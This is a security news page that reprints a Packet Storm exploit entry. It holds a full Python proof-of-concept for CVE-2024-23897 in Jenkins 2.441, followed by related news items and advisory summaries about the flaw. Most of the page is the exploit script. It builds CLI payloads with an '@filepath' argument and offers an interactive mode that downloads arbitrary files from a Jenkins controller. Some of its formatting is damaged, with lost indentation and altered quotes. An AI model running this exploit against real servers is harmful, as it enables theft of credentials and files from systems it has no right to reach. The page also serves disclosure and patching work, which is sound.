Security
Headlines
HeadlinesLatestCVEs

Headline

Jenkins 2.441 Local File Inclusion

Jenkins version 2.441 suffers from a local file inclusion vulnerability.

Packet Storm
#vulnerability#debian#git#auth

Exploit Title: Jenkins 2.441 - Local File Inclusion

Date: 14/04/2024

Exploit Author: Matisse Beckandt (Backendt)

Vendor Homepage: https://www.jenkins.io/

Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip

Version: 2.441

Tested on: Debian 12 (Bookworm)

CVE: CVE-2024-23897

from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall

class Exploit(Thread):
def init(self, url: str, identifier: str):
Thread.init(self)
self.daemon = True
self.url = url
self.params = {"remoting": "false"}
self.identifier = identifier
self.stop_thread = False
self.listen = False

def run(self):
while not self.stop_thread:
if self.listen:
self.listen_and_print()

def stop(self):
self.stop_thread = True

def receive_next_message(self):
self.listen = True

def wait_for_message(self):
while self.listen:
sleep(0.5)

def print_formatted_output(self, output: str):
if “ERROR: No such file” in output:
print(“File not found.”)
elif “ERROR: Failed to parse” in output:
print(“Could not read file.”)

expression = "No such agent \"(.*)\" exists."  
results = findall(expression, output)  
print("\n".join(results))

def listen_and_print(self):
session = Session()
headers = {"Side": "download", "Session": self.identifier}
try:
response = session.post(self.url, params=self.params, headers=headers)
except (exceptions.ConnectTimeout, exceptions.ConnectionError):
print(“Could not connect to target to setup the listener.”)
exit(1)

self.print_formatted_output(response.text)  
self.listen = False

def send_file_request(self, filepath: str):
headers = {"Side": "upload", "Session": self.identifier}
payload = get_payload(filepath)
try:
post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
except (exceptions.ConnectTimeout, exceptions.ConnectionError):
print(“Could not connect to the target to send the request.”)
exit(1)

def read_file(self, filepath: str):
self.receive_next_message()
sleep(0.1)
self.send_file_request(filepath)
self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:
text_bytes = bytes(text, “utf-8”)
text_size = len(text_bytes)
text_message = text_size.to_bytes(2) + text_bytes
message_size = len(text_message)

payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message
return payload

def get_payload(filepath: str) -> bytes:
arg_operation = 0
start_operation = 3

command = get_payload_message(arg_operation, “connect-node”)
poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

payload = command + poisoned_argument + start_operation.to_bytes(1)
return payload

def start_interactive_file_read(exploit: Exploit):
print(“Press Ctrl+C to exit”)
while True:
filepath = input("File to download:\n> ")
filepath = make_path_absolute(filepath)
exploit.receive_next_message()

try:  
  exploit.read_file(filepath)  
except exceptions.ReadTimeout:  
  print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:
if not filepath.startswith(‘/’):
return f"/proc/self/cwd/{filepath}"
return filepath

def format_target_url(url: str) -> str:
if url.endswith(‘/’):
url = url[:-1]
return f"{url}/cli"

def get_arguments():
parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
parser.add_argument("-u", “–url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/”)
parser.add_argument("-p", “–path", help="The absolute path of the file to download”)
return parser.parse_args()

def main():
args = get_arguments()
url = format_target_url(args.url)
filepath = args.path
identifier = str(uuid4())

exploit = Exploit(url, identifier)
exploit.start()

if filepath:
filepath = make_path_absolute(filepath)
exploit.read_file(filepath)
exploit.stop()
return

try:
start_interactive_file_read(exploit)
except KeyboardInterrupt:
pass
print(“\nQuitting”)
exploit.stop()

if name == "main":
main()

Related news

CISA Warns of Critical Jenkins Vulnerability Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting Jenkins to its Known Exploited Vulnerabilities (KEV) catalog, following its exploitation in ransomware attacks. The vulnerability, tracked as CVE-2024-23897 (CVSS score: 9.8), is a path traversal flaw that could lead to code execution. "Jenkins Command Line Interface (CLI) contains a

Red Hat Security Advisory 2024-0778-03

Red Hat Security Advisory 2024-0778-03 - An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, improper authorization, information leakage, insecure permissions, and open redirection vulnerabilities.

Red Hat Security Advisory 2024-0776-03

Red Hat Security Advisory 2024-0776-03 - An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.13. Issues addressed include bypass, code execution, cross site scripting, and denial of service vulnerabilities.

Red Hat Security Advisory 2024-0775-03

Red Hat Security Advisory 2024-0775-03 - An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.11. Issues addressed include bypass, code execution, cross site scripting, deserialization, information leakage, and insecure permissions vulnerabilities.

Excessive Expansion Vulnerabilities Leave Jenkins Servers Open to Attacks

By Deeba Ahmed The vulnerabilities stem from the way Jenkins handles user-supplied data. This is a post from HackRead.com Read the original post: Excessive Expansion Vulnerabilities Leave Jenkins Servers Open to Attacks

Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP!

The maintainers of the open-source continuous integration/continuous delivery and deployment (CI/CD) automation software Jenkins have resolved nine security flaws, including a critical bug that, if successfully exploited, could result in remote code execution (RCE). The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the

GHSA-6f9g-cxwr-q5jr: Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE

Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. * Attackers with Overall/Read permission can read entire files. * Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent relea...

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution